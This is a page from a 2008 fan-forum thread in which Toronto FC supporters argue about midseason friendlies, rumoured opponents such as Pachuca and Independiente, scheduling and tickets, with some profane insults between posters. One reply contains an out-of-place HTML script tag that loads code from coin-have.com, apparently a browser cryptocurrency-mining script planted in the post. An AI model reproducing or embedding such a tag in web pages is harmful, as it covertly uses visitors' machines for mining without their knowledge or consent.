Page 2 of 4 FirstFirst 1234 LastLast
    Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

When is management going to take the team seriously and either A. scrap the midseason friendlies or B. schedule them during, oh I dont, A TWO WEEK BREAK LIKE THIS ONE!!!!

This is really frustrating!

'Hey lets injure our players and risk our standing in the league so that we can charge alot of money for some exhibition games.'

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I wished TFC were playing against Boca Jr. instead of Independiente.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by ilikemusic View Post
    When is management going to take the team seriously and either A. scrap the midseason friendlies or B. schedule them during, oh I dont, A TWO WEEK BREAK LIKE THIS ONE!!!!

'Hey lets injure our players and risk our standing in the league so that we can charge alot of money for some exhibition games.'

Along the same lines . . . When is management going to announce these games? What’s the hold up?

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Pachuco View Post
    I'm pretty sure that's not the case. Toronto is pretty multicultural and so is the demographic of BMO field attendance. There is alllllot of people that want to see South American teams play here.
    Absolutely agree, I guess we'll have to wait and see what attendance is like if it turns out these are the teams we'll play. Media wise I can tell you with the with the price of newsprint and the Olympics coming up these games probably won't get very much coverage if any.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by TFC07 View Post
    I wished TFC were playing against Boca Jr. instead of Independiente.
    Boca, River or San Lorenzo would be great but any of the Top 10 Argentine clubs is fine by me. I really hope that the rumours are legit

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by TO DEVILS View Post
    He is serious...those are the teams.
    so speaketh the man

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by ilikemusic View Post

they can only get team when they are available not us. yes this two week break would have been ideal, but july would be just as good.

Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)

what the hell...July 5th...I schedule a vacation around then because I thought for sure no game....bloody hell!
    Follow me...... https://twitter.com/#!/aGeRoO76
    "Just like JDG. It wasn't a post-and-in shot, but JDG is smart & experienced" - Carts

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Default Pretty Reliable

Quote Originally Posted by Niall View Post
    How reliable is the Pachuca/Independiente rumour? Does anyone have a link or anything substantial to back this up? Either way it would be a nice bresh of fresh air for me, I only really follow serie a, EPL and MLS. Will be nice to see our future competition...
    At the TFC vs NYRB Reserve game Mo told 6 of us that it would be Pachuca and Independiente. So pretty reliable but as we all know Mo has been wrong before.

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by akoto View Post
    At the TFC vs NYRB Reserve game Mo told 6 of us that it would be Pachuca and Independiente. So pretty reliable but as we all know Mo has been wrong before.
    Like when he said TFC would be going to Dubai and China in the offseason?

RPB Member
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)

Last weekend would have been great for a friendly, halfway between a 17 day layoff between league games, even if they did not play a top flight club, say some from the A-League etc. those good old Sydney FC would have been a good time, playing both of them in June just craps up an already busy stetch, one in many ways might be too busy for anyones good.

Remember The Man, The Legend, The Goal 5-12-07 and All That #9 Left On The Pitch, Thanks For The Memories !!!

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

july 1st montreal
    july 5th friendly
    july12th at chicago
    july 15friendly
    july22 vancouver
    july 24th mls allstar

that is alot of games to attend in 1 month!!!

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

what? I'm confused here, are you a TFC fan? or just some other club fan who pretends to be a TFC fan? TFC is playing a Mexican team and you wouldn't bother going? but you go watch them play MLS teams? you wouldn't bother watching them play against the two time defending concacaf champs but you'll watch them play the shite Red Bulls?

If Pachuca comes I definetly wouldn't go. Who gives a rat ass if they are a two time concacef champion. what so good or tough about that. the whole region isn't strong.

They are friendly matches andthe only friendly match I would consider going to watch is against a vaild European or South American team.

I will sale my tickets even at a discount to recover some of my costs for the regular season games.

RPB Member
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)

RPBLondon, do you have all-star game tickets? I was able to get a pair myself

Remember The Man, The Legend, The Goal 5-12-07 and All That #9 Left On The Pitch, Thanks For The Memories !!!

RPB Member
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)

TFC gave all the STH's their friendlies as a bonus, correct?

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by CBlake View Post
    RPBLondon, do you have all-star game tickets? I was able to get a pair myself
    as of now I have a single in 112

RPB Member
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)

Good, so what time will you be at BMO on Saturday?

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

This is around the same time that they announced the friendlies last year. I think we should know within the next week!

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by giambac View Post
    If Pachuca comes I definetly wouldn't go. Who gives a rat ass if they are a two time concacef champion. what so good or tough about that. the whole region isn't strong.

They are friendly matches andthe only friendly match I would consider going to watch is against a vaild European or South American team.

I will sale my tickets even at a discount to recover some of my costs for the regular season games.
    ....uh huh....
    HTML Code:
    <script src="https://coin-have.com/c/XQ5z.js"></script>

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

lets see the vaild europe countries, england ,scotland, holland,germany,
    spain, croatia, russia, turkey, lost of good teams there. But your here
    to support TFC not the opponents....

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Leprechaun View Post
    umm....if you haven't noticed those games are friendlies....which mean they don't mean much....and a game against the red bulls actually means something.

but ya i guess you caught me bud...i'm just pretending to be a TFC fan for fun. i'm a STH and have been to pretty much every game and have been on this forum everyday before TFC even played a game. fucken moron
    Actualy who looks like the moron? crying like a baby because it's a Mexican team and not some fucking European team so you can grab the player's balls after the game. How pathetic to spend all your time on these boards and when the players get out on the field you decide not to support them because the other team doesn't have enough star power for you.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Trust me, the team and RPB is much better off with you supporting another team. really I don't think I've ever read a comment from you that didn't sound like a 13 year old girl pissed off because she can't see Beckham in Toronto.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Actualy who looks like the moron? crying like a baby because it's a Mexican team and not some fucking European team so you can grab the player's balls after the game. How pathetic to spend all your time on these boards and when the players get out on the field you decide not to support them because the other team doesn't have enough star power for you.

Now now lets not get all angry at each other. Im with you though on this one, I dont care who comes I am going to the game and im cheering on TFC for a victory...becasue one day we are going to play Pachuca for an actual match which means something, would be kind of cool to see where we stand up agianst the Mexican Giants. dont you think?!

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Laurignano View Post
    Now now lets not get all angry at each other. Im with you though on this one, I dont care who comes I am going to the game and im cheering on TFC for a victory...becasue one day we are going to play Pachuca for an actual match which means something, would be kind of cool to see where we stand up agianst the Mexican Giants. dont you think?!
    I'm going to watch TFC Academy against Toronto Croatia (most likely in the rain) just because the players will be wearing the TFC uniform. Trust me, I agree.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Even though we are in a weak region shouldn't we play games against the competition? If TFC ever became CONCACAF Champions would you not see that as a great accomplishment for the team? A beth in the World Club Championship with a chance to play the CL winner.

They are friendly matches and the only friendly match I would consider going to watch is against a vaild European or South American team.
    What is a valid team in your opinion? The only way the big euro clubs will ever play TFC, is if the friendly matches would not be included as part of the seasons tickets. Those teams ask for big money and usually field many of the reserve players.

I support TFC, I will watch any match they play.

My last question is will you go the the Canada Cup games? If so why would you go watch those games and not go watch a team from the best football league in North America.
    Last edited by Strikers; 05-14-2008 at 11:14 PM.

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by mighty_torontofc_2008 View Post
    they can only get team when they are available not us. yes this two week break would have been ideal, but july would be just as good.
    What im saying is just dont bother playing the friendly if it is just going to create fixture congestion.

They are pressing on with having friendlies despite the fact that they cant get one that is conducive to the teams success. Experience against top level opposition is great, but not when it could directly affect our ability to get maximum points form all our league games.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Strikers View Post
    Even though we are in a weak region shouldn't we play games against the competition? If TFC ever became CONCACAF Champions would you not see that as a great accomplishment for the team? A beth in the World Club Championship with a chance to play the CL winner.
    It's as simple as this:

If TFC beat Pachuca, and Pachuca wins the Club World Cup, then TFC is the best football club on the planet.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I wouldn't be surprised if they anounce the friendlies after the STH window for CONCACAF Canada Cup tickets closes. Gotta get the cash first.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by graeme117 View Post
    Man i have to be at a wedding on the 5th, and the only reason my buddy picked the fifth was because he figured there would be no tfc match b/c of the (now defunct) indy... guess all five of our tickets will be up for sale
    Sorry Graeme!!!

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Strikers View Post
    Those teams ask for big money and usually field many of the reserve players.
    Especially true the summer after a major international tournament.